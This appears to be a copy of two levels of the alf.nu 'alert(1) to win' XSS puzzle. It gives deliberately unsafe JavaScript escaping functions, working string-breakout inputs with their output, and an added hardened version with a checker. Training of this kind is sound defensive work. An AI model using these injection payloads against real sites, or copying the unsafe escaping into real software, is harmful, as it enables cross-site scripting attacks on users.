alert(1) to win

alf.nu/alert(1)

The code below generates HTML in an unsafe way. Prove it by calling alert(1).

Warmup

function escape(s) {
  return '<script>console.log("' + s + '");</script>';
}

Input (12)

",alert(1),"

Output

<script>console.log("",alert(1),"");</script>

Adobe

function escape(s) {
  s = s.replace(/"/g, '\\"');
  return '<script>console.log("' + s + '");</script>';
}

Input (14)

\",alert(1))//

Output

<script>console.log("\\",alert(1))//");</script>
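Added example, not part of the original page or of alf.nu: the two functions above shown beside a hardened form, with a small check that the input stayed inside the string literal. The names escapeWarmup, escapeAdobe, escapeHardened and staysInsideLiteral are hypothetical; the two inputs are the ones listed above.

```javascript
// The page's two functions, renamed so they can sit side by side.
function escapeWarmup(s) {
  return '<script>console.log("' + s + '");</script>';
}
function escapeAdobe(s) {
  s = s.replace(/"/g, '\\"');   // escapes the quote but not the backslash
  return '<script>console.log("' + s + '");</script>';
}

// Hardened form: JSON.stringify escapes both " and \, so the input cannot end
// the literal. The extra replace hides <, > and & from the HTML parser (so the
// data cannot close the script element); U+2028/U+2029 are escaped because
// they were line terminators inside string literals before ES2019.
function escapeHardened(s) {
  const literal = JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
  return '<script>console.log(' + literal + ');</script>';
}

// True only if the output is exactly one script element whose body is
// console.log("<one string literal>");  A minimal scanner, not a JS parser.
function staysInsideLiteral(html) {
  const open = '<script>console.log("';
  const close = '</script>';
  const end = html.indexOf(close);          // the HTML parser ends the script here
  if (!html.startsWith(open) || end !== html.length - close.length) return false;
  const body = html.slice(open.length, end);
  for (let i = 0; i < body.length; i++) {
    if (body[i] === '\\') { i++; continue; } // escape sequence: skip the next char
    if (body[i] === '"') return body.slice(i + 1) === ');';
  }
  return false;                              // literal never terminated
}

// The two inputs from the page.
const pageInputs = ['",alert(1),"', '\\",alert(1))//'];

for (const input of pageInputs) {
  console.log(JSON.stringify(input),
    'warmup:', staysInsideLiteral(escapeWarmup(input)),
    'adobe:', staysInsideLiteral(escapeAdobe(input)),
    'hardened:', staysInsideLiteral(escapeHardened(input)));
}
```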